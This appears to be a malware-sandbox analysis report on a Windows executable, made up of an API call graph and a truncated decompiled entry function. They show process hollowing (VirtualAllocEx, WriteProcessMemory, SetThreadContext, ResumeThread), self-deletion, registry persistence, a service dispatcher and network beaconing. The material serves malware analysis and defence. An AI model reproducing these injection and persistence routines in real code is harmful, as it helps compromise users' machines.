TerminateProcess 19752->19753 19753->19748 19755 409816 19755->19753 19756 40981e WriteProcessMemory 19755->19756 19756->19752 19757 40983b SetThreadContext 19756->19757 19757->19752 19758 409858 ResumeThread 19757->19758 19758->19748 19760 403edc 19759->19760 19762 403ee2 19759->19762 19782 406dc2 19760->19782 19762->19722 19764 40400b CreateFileA 19763->19764 19765 40402c GetLastError 19764->19765 19766 404052 19764->19766 19765->19766 19767 404037 19765->19767 19766->19720 19766->19725 19766->19726 19767->19766 19768 404041 Sleep 19767->19768 19768->19764 19768->19766 19770 403f4e GetLastError 19769->19770 19772 403f7c 19769->19772 19771 403f5b WaitForSingleObject GetOverlappedResult 19770->19771 19770->19772 19771->19772 19773 403f8c ReadFile 19772->19773 19774 403ff0 19773->19774 19775 403fc2 GetLastError 19773->19775 19774->19731 19774->19732 19775->19774 19776 403fcf WaitForSingleObject GetOverlappedResult 19775->19776 19776->19774 19778 40ec37 19777->19778 19779 40438f 19777->19779 19800 40eba0 19778->19800 19779->19743 19783 406e24 19782->19783 19784 406dd7 19782->19784 19783->19762 19788 406cc9 19784->19788 19786 406ddc 19786->19783 19786->19786 19787 406e02 GetVolumeInformationA 19786->19787 19787->19783 19789 406cdc GetModuleHandleA GetProcAddress 19788->19789 19790 406dbe 19788->19790 19791 406d12 GetSystemDirectoryA 19789->19791 19792 406cfd 19789->19792 19790->19786 19793 406d27 GetWindowsDirectoryA 19791->19793 19794 406d1e 19791->19794 19792->19791 19796 406d8b 19792->19796 19795 406d42 19793->19795 19794->19793 19794->19796 19798 40ef1e lstrlenA 19795->19798 19796->19790 19799 40ef32 19798->19799 19799->19796 19801 40eba7 GetProcessHeap HeapSize 19800->19801 19802 40ebbf GetProcessHeap HeapFree 19800->19802 19801->19802 19802->19779 19804 409794 CreateProcessA 19803->19804 19804->19748 19804->19749 19806 406386 19805->19806 19807 40638a GetModuleHandleA VirtualAlloc 19805->19807 19806->19755 19808 4063f5 19807->19808 19809 4063b6 19807->19809 
19808->19755 19810 4063be VirtualAllocEx 19809->19810 19810->19808 19811 4063d6 19810->19811 19812 4063df WriteProcessMemory 19811->19812 19812->19808 20970 404861 IsBadWritePtr 20971 404876 20970->20971 19826 409a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 19827 40ec54 2 API calls 19826->19827 19828 409a95 19827->19828 19829 409aa3 GetModuleHandleA GetModuleFileNameA 19828->19829 19834 40a3c7 19828->19834 19842 409ac4 19829->19842 19830 40a41c CreateThread WSAStartup 20053 40e52e 19830->20053 19831 409afd GetCommandLineA 19843 409b22 19831->19843 19832 40a406 DeleteFileA 19832->19834 19835 40a40d 19832->19835 19834->19830 19834->19832 19834->19835 19837 40a3ed GetLastError 19834->19837 19835->19830 19836 40a445 20072 40eaaf 19836->20072 19837->19835 19840 40a3f8 Sleep 19837->19840 19839 40a44d 20076 401d96 19839->20076 19840->19832 19842->19831 19847 409c0c 19843->19847 19853 409b47 19843->19853 19943 4096aa 19847->19943 19857 409b96 lstrlenA 19853->19857 19859 409b58 19853->19859 19854 40a1d2 19860 40a1e3 GetCommandLineA 19854->19860 19855 409c39 19858 40a167 GetModuleHandleA GetModuleFileNameA 19855->19858 19864 409c4b 19855->19864 19857->19859 19862 409c05 ExitProcess 19858->19862 19863 40a189 19858->19863 19859->19862 19865 409bd2 19859->19865 19882 40a205 19860->19882 19861 40c125 15 API calls 19866 40a47a 19861->19866 19863->19862 19873 40a1b2 GetDriveTypeA 19863->19873 19864->19858 19867 404280 30 API calls 19864->19867 19955 40675c 19865->19955 20156 408db1 19866->20156 19868 409c5b 19867->19868 19868->19858 19875 40675c 21 API calls 19868->19875 19873->19862 19874 40a1c5 19873->19874 20045 409145 GetModuleHandleA GetModuleFileNameA CharToOemA 19874->20045 19877 409c79 19875->19877 19877->19858 19885 409ca0 GetTempPathA 19877->19885 19887 409e3e 19877->19887 19878 409bff 19878->19862 19880 40a491 19881 40a49f GetTickCount 19880->19881 19883 40a4be Sleep 19880->19883 19888 40a4b7 GetTickCount 19880->19888 20160 40c913 19880->20160 19881->19880 
19881->19883 19892 40a285 lstrlenA 19882->19892 19902 40a239 19882->19902 19883->19880 19886 409cba 19885->19886 19885->19887 19993 4099d2 lstrcpyA 19886->19993 19891 409e6b GetEnvironmentVariableA 19887->19891 19895 409e04 19887->19895 19888->19883 19890 40ec2e codecvt 4 API calls 19894 40a15d 19890->19894 19891->19895 19896 409e7d 19891->19896 19892->19902 19894->19858 19894->19862 19895->19890 19897 4099d2 16 API calls 19896->19897 19898 409e9d 19897->19898 19898->19895 19904 409eb0 lstrcpyA lstrlenA 19898->19904 19899 406dc2 6 API calls 19901 409d5f 19899->19901 19907 406cc9 5 API calls 19901->19907 19951 406ec3 19902->19951 19903 40a3c2 19905 4098f2 41 API calls 19903->19905 19906 409ef4 19904->19906 19905->19834 19908 406dc2 6 API calls 19906->19908 19911 409f03 19906->19911 19910 409d72 lstrcpyA lstrcatA lstrcatA 19907->19910 19908->19911 19909 40a39d StartServiceCtrlDispatcherA 19909->19903 19914 409cf6 19910->19914 19912 409f32 RegOpenKeyExA 19911->19912 19913 409f48 RegSetValueExA RegCloseKey 19912->19913 19918 409f70 19912->19918 19913->19918 20000 409326 19914->20000 19915 40a35f 19915->19903 19915->19909 19923 409f9d GetModuleHandleA GetModuleFileNameA 19918->19923 19919 409e0c DeleteFileA 19919->19887 19920 409dde GetFileAttributesExA 19920->19919 19921 409df7 19920->19921 19921->19895 20037 4096ff 19921->20037 19925 409fc2 19923->19925 19926 40a093 19923->19926 19925->19926 19932 409ff1 GetDriveTypeA 19925->19932 19927 40a103 CreateProcessA 19926->19927 19928 40a0a4 wsprintfA 19926->19928 19929 40a13a 19927->19929 19930 40a12a DeleteFileA 19927->19930 20043 402544 19928->20043 19929->19895 19935 4096ff 3 API calls 19929->19935 19930->19929 19932->19926 19934 40a00d 19932->19934 19937 40a02d lstrcatA 19934->19937 19935->19895 19936 40ee2a 19938 40a0ec lstrcatA 19936->19938 19939 40a046 19937->19939 19938->19927 19940 40a052 lstrcatA 19939->19940 19941 40a064 lstrcatA 19939->19941 19940->19941 19941->19926 19942 40a081 lstrcatA 19941->19942 
__chvalidator_l 21000->21002 21001->21002 21002->20998 21566 421280 21567 429980 ___InternalCxxFrameHandler RtlEncodePointer 21566->21567 21568 4212ac 21567->21568 21108 40f483 WSAStartup 21812 40f304 21815 40f26d setsockopt setsockopt setsockopt setsockopt setsockopt 21812->21815 21814 40f312 21815->21814 21827 405b84 IsBadWritePtr 21828 405b99 21827->21828 21829 405b9d 21827->21829 21830 404bd1 4 API calls 21829->21830 21831 405bcc 21830->21831 21832 405472 18 API calls 21831->21832 21833 405be5 21832->21833 21003 405c05 IsBadWritePtr 21004 405c24 IsBadWritePtr 21003->21004 21011 405ca6 21003->21011 21005 405c32 21004->21005 21004->21011 21006 405c82 21005->21006 21007 404bd1 4 API calls 21005->21007 21008 404bd1 4 API calls 21006->21008 21007->21006 21009 405c90 21008->21009 21012 405472 21009->21012 21031 404763 21012->21031 21014 405b58 21041 404699 21014->21041 21017 404763 lstrlenA 21018 405b6e 21017->21018 21062 404f9f 21018->21062 21020 405b79 21020->21011 21022 405549 lstrlenA 21030 40548a 21022->21030 21024 40558d lstrcpynA 21024->21030 21025 404ae6 8 API calls 21025->21030 21026 405a9f lstrcpyA 21026->21030 21027 405935 lstrcpynA 21027->21030 21028 405472 13 API calls 21028->21030 21029 4058e7 lstrcpyA 21029->21030 21030->21014 21030->21024 21030->21025 21030->21026 21030->21027 21030->21028 21030->21029 21035 404ae6 21030->21035 21039 40ef7c lstrlenA lstrlenA lstrlenA 21030->21039 21033 40477a 21031->21033 21032 404859 21032->21030 21033->21032 21034 40480d lstrlenA 21033->21034 21034->21033 21036 404af3 21035->21036 21038 404b03 21035->21038 21037 40ebed 8 API calls 21036->21037 21037->21038 21038->21022 21040 40efb4 21039->21040 21040->21030 21067 4045b3 21041->21067 21044 4045b3 7 API calls 21045 4046c6 21044->21045 21046 4045b3 7 API calls 21045->21046 21047 4046d8 21046->21047 21048 4045b3 7 API calls 21047->21048 21049 4046ea 21048->21049 21050 4045b3 7 API calls 21049->21050 21051 4046ff 21050->21051 21052 4045b3 7 API calls 21051->21052 21053 
404711 21052->21053 21054 4045b3 7 API calls 21053->21054 21055 404723 21054->21055 21056 40ef7c 3 API calls 21055->21056 21057 404735 21056->21057 21058 40ef7c 3 API calls 21057->21058 21059 40474a 21058->21059 21060 40ef7c 3 API calls 21059->21060 21061 40475c 21060->21061 21061->21017 21063 404fac 21062->21063 21066 404fb0 21062->21066 21063->21020 21064 404ffd 21064->21020 21065 404fd5 IsBadCodePtr 21065->21066 21066->21064 21066->21065 21068 4045c1 21067->21068 21069 4045c8 21067->21069 21070 40ebcc 4 API calls 21068->21070 21071 40ebcc 4 API calls 21069->21071 21073 4045e1 21069->21073 21070->21069 21071->21073 21072 404691 21072->21044 21073->21072 21074 40ef7c 3 API calls 21073->21074 21074->21073 21084 404c0d 21085 404ae6 8 API calls 21084->21085 21086 404c17 21085->21086 21463 405e0d 21466 4050dc 21463->21466 21465 405e20 21467 404bd1 4 API calls 21466->21467 21468 4050f2 21467->21468 21469 404ae6 8 API calls 21468->21469 21470 4050ff 21469->21470 21471 405130 21470->21471 21472 404ae6 8 API calls 21470->21472 21476 404ae6 8 API calls 21470->21476 21473 404ae6 8 API calls 21471->21473 21474 405110 lstrcmpA 21472->21474 21475 405138 21473->21475 21474->21470 21474->21471 21477 40516e 21475->21477 21478 404ae6 8 API calls 21475->21478 21508 40513e 21475->21508 21476->21470 21480 404ae6 8 API calls 21477->21480 21477->21508 21479 40515e 21478->21479 21479->21477 21482 404ae6 8 API calls 21479->21482 21481 4051b6 21480->21481 21509 404a3d 21481->21509 21482->21477 21485 404ae6 8 API calls 21486 4051c7 21485->21486 21487 404ae6 8 API calls 21486->21487 21488 4051d7 21487->21488 21489 404ae6 8 API calls 21488->21489 21490 4051e7 21489->21490 21491 404ae6 8 API calls 21490->21491 21490->21508 21492 405219 21491->21492 21493 404ae6 8 API calls 21492->21493 21494 405227 21493->21494 21495 404ae6 8 API calls 21494->21495 21496 40524f lstrcpyA 21495->21496 21497 404ae6 8 API calls 21496->21497 21500 405263 21497->21500 21498 404ae6 8 API calls 21499 405315 
21498->21499 21501 404ae6 8 API calls 21499->21501 21500->21498 21502 405323 21501->21502 21503 404ae6 8 API calls 21502->21503 21505 405331 21503->21505 21504 404ae6 8 API calls 21504->21505 21505->21504 21506 404ae6 8 API calls 21505->21506 21505->21508 21507 405351 lstrcmpA 21506->21507 21507->21505 21507->21508 21508->21465 21510 404a53 21509->21510 21511 404a4a 21509->21511 21513 404a78 21510->21513 21516 40ebed 8 API calls 21510->21516 21512 40ebed 8 API calls 21511->21512 21512->21510 21514 404aa3 21513->21514 21515 404a8e 21513->21515 21518 40ebed 8 API calls 21514->21518 21519 404a9b 21514->21519 21517 40ec2e codecvt 4 API calls 21515->21517 21515->21519 21516->21513 21517->21519 21518->21519 21519->21485 19820 417710 HeapCreate 19821 41773a ___sbh_heap_init __heap_init 19820->19821 21087 416010 21088 416028 21087->21088 21090 41602d _parse_cmdline 21087->21090 21089 41ad60 ___initmbctable LCMapStringW 21088->21089 21089->21090 21128 406511 wsprintfA IsBadReadPtr 21129 40656a htonl htonl wsprintfA wsprintfA 21128->21129 21130 40674e 21128->21130 21135 4065f3 21129->21135 21131 40e318 23 API calls 21130->21131 21132 406753 ExitProcess 21131->21132 21133 40668a GetCurrentProcess StackWalk64 21134 4066a0 wsprintfA 21133->21134 21133->21135 21136 4066ba 21134->21136 21135->21133 21135->21134 21137 406652 wsprintfA 21135->21137 21138 406712 wsprintfA 21136->21138 21139 4066da wsprintfA 21136->21139 21140 4066ed wsprintfA 21136->21140 21137->21135 21141 40e8a1 30 API calls 21138->21141 21139->21140 21140->21136 21142 406739 21141->21142 21143 40e318 23 API calls 21142->21143 21144 406741 21143->21144 21569 404e92 GetTickCount 21570 404ec0 InterlockedExchange 21569->21570 21571 404ec9 21570->21571 21572 404ead GetTickCount 21570->21572 21572->21571 21573 404eb8 Sleep 21572->21573 21573->21570 21427 405d93 IsBadWritePtr 21428 405ddc 21427->21428 21429 405da8 21427->21429 21429->21428 21430 405389 12 API calls 21429->21430 21430->21428 21816 408314 21817 40675c 21 
API calls 21816->21817 21818 408324 21817->21818 21113 405099 21114 404bd1 4 API calls 21113->21114 21115 4050a2 21114->21115 19602 417020 19603 417032 __crt_wait_module_handle 19602->19603 19611 41703e __encode_pointer __initptd __mtterm 19603->19611 19612 416e30 19603->19612 19606 416e30 __encode_pointer RtlEncodePointer 19607 417141 19606->19607 19608 416e30 __encode_pointer RtlEncodePointer 19607->19608 19609 417155 19608->19609 19610 416e30 __encode_pointer RtlEncodePointer 19609->19610 19610->19611 19613 416e4b __crt_wait_module_handle 19612->19613 19614 416eb3 RtlEncodePointer 19613->19614 19615 416ebd 19613->19615 19614->19615 19615->19606 21520 405e21 21521 405e36 21520->21521 21522 405e29 21520->21522 21523 4050dc 17 API calls 21522->21523 21523->21521 21524 41ce20 21525 416f00 FindHandlerForForeignException RtlEncodePointer 21524->21525 21526 41ce34 21525->21526 21527 41ce6d __encode_pointer 21526->21527 21528 416e30 __encode_pointer RtlEncodePointer 21526->21528 21529 41ce9c 21528->21529 21530 416e30 __encode_pointer RtlEncodePointer 21529->21530 21531 41ceb9 21530->21531 21532 416e30 __encode_pointer RtlEncodePointer 21531->21532 21533 41ced6 21532->21533 21534 416e30 __encode_pointer RtlEncodePointer 21533->21534 21535 41cef9 21534->21535 21535->21527 21536 416e30 __encode_pointer RtlEncodePointer 21535->21536 21536->21527 21431 4035a5 21432 4030fa 4 API calls 21431->21432 21433 4035b3 21432->21433 21437 4035ea 21433->21437 21438 40355d 21433->21438 21435 4035da 21436 40355d 4 API calls 21435->21436 21435->21437 21436->21437 21439 40f04e 4 API calls 21438->21439 21440 40356a 21439->21440 21440->21435 21091 405029 21096 404a02 21091->21096 21097 404a12 21096->21097 21098 404a18 21096->21098 21099 40ec2e codecvt 4 API calls 21097->21099 21100 40ec2e codecvt 4 API calls 21098->21100 21101 404a26 21098->21101 21099->21098 21100->21101 21102 40ec2e codecvt 4 API calls 21101->21102 21103 404a34 21101->21103 21102->21103 21145 416930 21146 416976 
21145->21146 21148 40c125 15 API calls 21146->21148 21147 4169c0 ___crtInitCritSecAndSpinCount 21148->21147 21537 40be31 lstrcmpiA 21538 40be55 lstrcmpiA 21537->21538 21543 40be71 21537->21543 21539 40be61 lstrcmpiA 21538->21539 21538->21543 21542 40bfc8 21539->21542 21539->21543 21540 40bf62 lstrcmpiA 21541 40bf77 lstrcmpiA 21540->21541 21545 40bf70 21540->21545 21544 40bf8c lstrcmpiA 21541->21544 21541->21545 21543->21540 21548 40ebcc 4 API calls 21543->21548 21544->21545 21545->21542 21546 40bfc2 21545->21546 21547 40ec2e codecvt 4 API calls 21545->21547 21549 40ec2e codecvt 4 API calls 21546->21549 21547->21545 21552 40beb6 21548->21552 21549->21542 21550 40ebcc 4 API calls 21550->21552 21551 40bf5a 21551->21540 21552->21540 21552->21542 21552->21550 21552->21551 21819 421330 21820 421345 21819->21820 21821 429980 ___InternalCxxFrameHandler RtlEncodePointer 21820->21821 21822 42136f 21821->21822 21149 405d34 IsBadWritePtr 21150 405d47 21149->21150 21151 405d4a 21149->21151 21154 405389 21151->21154 21155 404bd1 4 API calls 21154->21155 21156 4053a5 21155->21156 21157 404ae6 8 API calls 21156->21157 21160 4053ad 21157->21160 21158 405407 21159 404ae6 8 API calls 21159->21160 21160->21158 21160->21159 21161 40b535 21162 40b566 21161->21162 21163 40ebcc 4 API calls 21162->21163 21164 40b587 21163->21164 21165 40ebcc 4 API calls 21164->21165 21201 40b590 21165->21201 21166 40bdcd InterlockedDecrement 21167 40bde2 21166->21167 21169 40ec2e codecvt 4 API calls 21167->21169 21170 40bdea 21169->21170 21172 40ec2e codecvt 4 API calls 21170->21172 21171 40bdb7 Sleep 21171->21201 21173 40bdf2 21172->21173 21174 40be05 21173->21174 21176 40ec2e codecvt 4 API calls 21173->21176 21175 40bdcc 21175->21166 21176->21174 21177 40ebed 8 API calls 21177->21201 21180 40b6b6 lstrlenA 21180->21201 21181 4030b5 2 API calls 21181->21201 21182 40e819 11 API calls 21182->21201 21183 40b6ed lstrcpyA 21229 405ce1 21183->21229 21186 40b731 lstrlenA 21186->21201 21187 40b71f lstrcmpA 
21187->21186 21187->21201 21188 40bd49 InterlockedIncrement 21317 40a628 21188->21317 21191 40b7ce InterlockedIncrement 21239 40acd7 21191->21239 21192 40bc5b InterlockedIncrement 21192->21201 21193 4038f0 6 API calls 21193->21201 21195 40b826 InterlockedIncrement 21195->21201 21196 40bcdc closesocket 21196->21201 21197 40bc6d InterlockedIncrement 21197->21201 21198 40a7c1 22 API calls 21198->21201 21200 40bba6 InterlockedIncrement 21200->21201 21201->21166 21201->21171 21201->21175 21201->21177 21201->21180 21201->21181 21201->21182 21201->21183 21201->21186 21201->21187 21201->21188 21201->21191 21201->21192 21201->21193 21201->21195 21201->21196 21201->21197 21201->21198 21201->21200 21202 40bc4c closesocket 21201->21202 21204 40ab81 lstrcpynA InterlockedIncrement 21201->21204 21206 405ce1 22 API calls 21201->21206 21207 40ba71 wsprintfA 21201->21207 21209 40ef1e lstrlenA 21201->21209 21210 405ded 12 API calls 21201->21210 21211 403e10 21201->21211 21214 403e4f 21201->21214 21217 40384f 21201->21217 21237 40a7a3 inet_ntoa 21201->21237 21244 40abee 21201->21244 21276 403cfb 21201->21276 21279 40b3c5 21201->21279 21310 40a51d 21201->21310 21202->21201 21204->21201 21206->21201 21256 40a7c1 21207->21256 21209->21201 21210->21201 21212 4030fa 4 API calls 21211->21212 21213 403e1d 21212->21213 21213->21201 21215 4030fa 4 API calls 21214->21215 21216 403e5c 21215->21216 21216->21201 21218 4030fa 4 API calls 21217->21218 21219 403863 21218->21219 21220 4038b9 21219->21220 21221 403889 21219->21221 21228 4038b2 21219->21228 21326 4035f9 21220->21326 21320 403718 21221->21320 21226 4035f9 6 API calls 21226->21228 21227 403718 6 API calls 21227->21228 21228->21201 21230 405cf4 21229->21230 21231 405cec 21229->21231 21233 404bd1 4 API calls 21230->21233 21232 404bd1 4 API calls 21231->21232 21232->21230 21234 405d02 21233->21234 21235 405472 18 API calls 21234->21235 21236 405d1c 21235->21236 21236->21201 21238 40a7b9 21237->21238 21238->21201 21240 40f315 14 API calls 
21239->21240 21241 40aceb 21240->21241 21242 40acff 21241->21242 21243 40f315 14 API calls 21241->21243 21242->21201 21243->21242 21245 40abfb 21244->21245 21248 40ac65 21245->21248 21332 402f22 21245->21332 21247 40f315 14 API calls 21247->21248 21248->21247 21249 40ac8a 21248->21249 21250 40ac6f 21248->21250 21249->21201 21340 40ab81 21250->21340 21251 40ac23 21251->21248 21254 402684 2 API calls 21251->21254 21254->21251 21257 40a87d lstrlenA send 21256->21257 21258 40a7df 21256->21258 21259 40a899 21257->21259 21260 40a8bf 21257->21260 21258->21257 21265 40a7fa wsprintfA 21258->21265 21266 40a80a 21258->21266 21268 40a8f2 21258->21268 21263 40a8a5 wsprintfA 21259->21263 21269 40a89e 21259->21269 21261 40a8c4 send 21260->21261 21260->21268 21264 40a8d8 wsprintfA 21261->21264 21261->21268 21262 40a978 recv 21262->21268 21270 40a982 21262->21270 21263->21269 21264->21269 21265->21266 21266->21257 21267 40a9b0 wsprintfA 21267->21269 21268->21262 21268->21267 21268->21270 21269->21201 21270->21269 21271 4030b5 2 API calls 21270->21271 21272 40ab05 21271->21272 21273 40e819 11 API calls 21272->21273 21274 40ab17 21273->21274 21275 40a7a3 inet_ntoa 21274->21275 21275->21269 21277 4030fa 4 API calls 21276->21277 21278 403d0b 21277->21278 21278->21201 21280 405ce1 22 API calls 21279->21280 21281 40b3e6 21280->21281 21282 405ce1 22 API calls 21281->21282 21284 40b404 21282->21284 21283 40b440 21285 40ef7c 3 API calls 21283->21285 21284->21283 21286 40ef7c 3 API calls 21284->21286 21287 40b458 wsprintfA 21285->21287 21288 40b42b 21286->21288 21289 40ef7c 3 API calls 21287->21289 21290 40ef7c 3 API calls 21288->21290 21291 40b480 21289->21291 21290->21283 21292 40ef7c 3 API calls 21291->21292 21293 40b493 21292->21293 21294 40ef7c 3 API calls 21293->21294 21295 40b4bb 21294->21295 21359 40ad89 GetLocalTime SystemTimeToFileTime 21295->21359 21299 40b4cc 21300 40ef7c 3 API calls 21299->21300 21301 40b4dd 21300->21301 21302 40b211 7 API calls 21301->21302 21303 40b4ec 
21302->21303 21304 40ef7c 3 API calls 21303->21304 21305 40b4fd 21304->21305 21306 40b211 7 API calls 21305->21306 21307 40b509 21306->21307 21308 40ef7c 3 API calls 21307->21308 21309 40b51a 21308->21309 21309->21201 21391 40a4c7 GetTickCount 21310->21391 21313 40a542 GetTickCount 21314 40a539 GetTickCount 21313->21314 21316 40a56c 21314->21316 21316->21201 21318 40a4c7 4 API calls 21317->21318 21319 40a633 21318->21319 21319->21201 21321 40f04e 4 API calls 21320->21321 21323 40372a 21321->21323 21322 403847 21322->21227 21322->21228 21323->21322 21324 4037b3 GetCurrentThreadId 21323->21324 21324->21323 21325 4037c8 GetCurrentThreadId 21324->21325 21325->21323 21327 40f04e 4 API calls 21326->21327 21331 40360c 21327->21331 21328 4036f1 21328->21226 21328->21228 21329 4036da GetCurrentThreadId 21329->21328 21330 4036e5 GetCurrentThreadId 21329->21330 21330->21328 21331->21328 21331->21329 21352 402d21 GetModuleHandleA 21332->21352 21335 402fcf GetProcessHeap HeapFree 21339 402f44 21335->21339 21336 402f4f 21338 402f6b GetProcessHeap HeapFree 21336->21338 21337 402f85 21337->21335 21337->21337 21338->21339 21339->21251 21341 40abe9 21340->21341 21343 40ab8c 21340->21343 21345 4038f0 21341->21345 21342 40aba8 lstrcpynA 21342->21343 21343->21341 21343->21342 21344 40abe1 InterlockedIncrement 21343->21344 21344->21343 21346 403900 21345->21346 21351 403980 21345->21351 21347 4030fa 4 API calls 21346->21347 21348 40390a 21347->21348 21349 40391b GetCurrentThreadId 21348->21349 21350 403939 GetCurrentThreadId 21348->21350 21348->21351 21349->21348 21350->21348 21351->21249 21353 402d46 LoadLibraryA 21352->21353 21354 402d5b GetProcAddress 21352->21354 21353->21354 21356 402d54 21353->21356 21354->21356 21358 402d6b 21354->21358 21355 402d97 GetProcessHeap HeapAlloc 21355->21356 21355->21358 21356->21336 21356->21337 21356->21339 21357 402db5 lstrcpynA 21357->21358 21358->21355 21358->21356 21358->21357 21360 40adbf 21359->21360 21384 40ad08 gethostname 21360->21384 21363 
4030b5 2 API calls 21364 40add3 21363->21364 21365 40ade4 21364->21365 21366 40a7a3 inet_ntoa 21364->21366 21367 40ae85 wsprintfA 21365->21367 21369 40ae36 wsprintfA wsprintfA 21365->21369 21366->21365 21368 40ef7c 3 API calls 21367->21368 21370 40aebb 21368->21370 21371 40ef7c 3 API calls 21369->21371 21372 40ef7c 3 API calls 21370->21372 21371->21365 21373 40aed2 21372->21373 21374 40b211 21373->21374 21375 40b2bb FileTimeToLocalFileTime FileTimeToSystemTime 21374->21375 21376 40b2af GetLocalTime 21374->21376 21377 40b2d2 21375->21377 21376->21377 21378 40b2d9 SystemTimeToFileTime 21377->21378 21379 40b31c GetTimeZoneInformation 21377->21379 21380 40b2ec 21378->21380 21381 40b33a wsprintfA 21379->21381 21382 40b312 FileTimeToSystemTime 21380->21382 21381->21299 21382->21379 21385 40ad71 21384->21385 21386 40ad26 lstrlenA 21384->21386 21388 40ad85 21385->21388 21389 40ad79 lstrcpyA 21385->21389 21386->21385 21390 40ad68 lstrlenA 21386->21390 21388->21363 21389->21388 21390->21385 21392 40a4f7 InterlockedExchange 21391->21392 21393 40a500 21392->21393 21394 40a4e4 GetTickCount 21392->21394 21393->21313 21393->21314 21394->21393 21395 40a4ef Sleep 21394->21395 21395->21392 21441 41a5b4 21442 41a5bd 21441->21442 21443 41a5dc __setmbcp_nolock 21442->21443 21447 41a707 __setmbcp_nolock 21442->21447 21445 41aa20 setSBUpLow LCMapStringW 21443->21445 21444 41a6fd __setmbcp_nolock 21445->21444 21446 41aa20 setSBUpLow LCMapStringW 21446->21444 21447->21444 21447->21446
C-Code - Quality: 89%

_entry_(CHAR* _a12, void* _a15) {
	char _v8;
	char _v12;
	intOrPtr _v16;
	char _v20;
	void* _v24;
	char _v28;
	char _v32;
	union _GET_FILEEX_INFO_LEVELS _v36;
	CHAR* _v40;
	char _v44;
	char _v48;
	struct _PROCESS_INFORMATION _v64;
	char _v80;
	char _v112;
	char _v371;
	char _v372;
	char _v671;
	char _v672;
	char _v704;
	struct _STARTUPINFOA _v772;
	char _v1271;
	char _v1272;
	char _v1672;
	char _t238;
	long _t239;
	char _t242;
	long _t244;
	CHAR* _t248;
	char _t250;
	intOrPtr _t257;
	char _t267;
	intOrPtr* _t272;
	char _t276;
	char _t279;
	char _t282;
	char _t283;
	void* _t284;
	char _t294;
	CHAR* _t303;
	int _t304;
	char _t309;
	CHAR* _t312;
	char _t318;
	int _t324;
	CHAR* _t325;
	char _t328;
	char* _t331;
	char _t332;
	char _t340;
	char _t344;
	CHAR* _t357;
	CHAR* _t358;
	int _t359;
	int _t373;
	long _t379;
	void* _t383;
	void* _t396;
	void* _t401;
	char _t402;
	char _t403;
	intOrPtr* _t410;
	void* _t411;
	char _t417;
	char _t418;
	void* _t424;
	intOrPtr _t426;
	void* _t428;
	char* _t436;
	intOrPtr _t441;
	CHAR* _t442;
	void* _t450;
	void* _t451;
	char _t459;
	void* _t464;
	void* _t465;
	void* _t467;
	void* _t468;
	void* _t469;
	void* _t470;
	void* _t471;
	void* _t474;
	intOrPtr _t475;

	SetErrorMode(3); // executed
                                                                                                                                  				SetErrorMode(3); // executed
                                                                                                                                  				SetUnhandledExceptionFilter(E00406511); // executed
                                                                                                                                  				E0040EC54(); // executed
                                                                                                                                  				_t475 =  *0x41201f; // 0x0
                                                                                                                                  				if(_t475 != 0) {
                                                                                                                                  					__eflags =  *0x4133d8; // 0x43
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						L126:
                                                                                                                                  						CreateThread(0, 0, E0040405E, 0, 0, 0);
                                                                                                                                  						__imp__#115(0x1010,  &_v1672);
                                                                                                                                  						E0040E52E(_t449, __eflags);
                                                                                                                                  						E0040EAAF(1, 0);
                                                                                                                                  						E00401D96(_t438, 0x412118);
                                                                                                                                  						E004080C9(_t438);
                                                                                                                                  						CreateThread(0, 0, E0040877E, 0, 0, 0);
                                                                                                                                  						E00405E6C(__eflags);
                                                                                                                                  						E00403132();
                                                                                                                                  						E0040C125(__eflags);
                                                                                                                                  						E00408DB1(_t438);
                                                                                                                                  						Sleep(0xbb8);
                                                                                                                                  						E0040C4EE();
                                                                                                                                  						while(1) {
                                                                                                                                  							__eflags =  *0x4133d0; // 0x0
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L129;
                                                                                                                                  							}
                                                                                                                                  							_t239 = GetTickCount();
                                                                                                                                  							__eflags = _t239 -  *0x4133d0 - 0x109a0;
                                                                                                                                  							if(_t239 -  *0x4133d0 < 0x109a0) {
                                                                                                                                  								L131:
                                                                                                                                  								Sleep(0x1a90);
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							L129:
                                                                                                                                  							_t238 = E0040C913();
                                                                                                                                  							__eflags = _t238;
                                                                                                                                  							if(_t238 == 0) {
                                                                                                                                  								 *0x4133d0 = GetTickCount();
                                                                                                                                  							}
                                                                                                                                  							goto L131;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_a12 = 0xa;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t242 = DeleteFileA(0x4133d8);
                                                                                                                                  						__eflags = _t242;
                                                                                                                                  						if(_t242 != 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _a12;
                                                                                                                                  						if(_a12 <= 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						_t244 = GetLastError();
                                                                                                                                  						__eflags = _t244 - 2;
                                                                                                                                  						if(_t244 == 2) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						_t219 =  &_a12;
                                                                                                                                  						 *_t219 = _a12 - 1;
                                                                                                                                  						__eflags =  *_t219;
                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                  					}
                                                                                                                                  					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
                                                                                                                                  					_t465 = _t465 + 0xc;
                                                                                                                                  					goto L126;
                                                                                                                                  				} else {
                                                                                                                                  					_v12 = 0;
                                                                                                                                  					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
                                                                                                                                  						_v672 = 0;
                                                                                                                                  					}
                                                                                                                                  					if(_v672 == 0x22) {
                                                                                                                                  						E0040EF00( &_v672,  &_v671);
                                                                                                                                  						_t436 = E0040ED23( &_v672, 0x22);
                                                                                                                                  						_t465 = _t465 + 0x10;
                                                                                                                                  						if(_t436 != 0) {
                                                                                                                                  							 *_t436 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t248 = GetCommandLineA();
                                                                                                                                  					_t459 = 0x4122f8;
                                                                                                                                  					_a12 = _t248;
                                                                                                                                  					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
                                                                                                                                  					_t454 = 0x100;
                                                                                                                                  					_v8 = _t250;
                                                                                                                                  					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
                                                                                                                                  					_t467 = _t465 + 0x28;
                                                                                                                                  					if(_v8 == 0) {
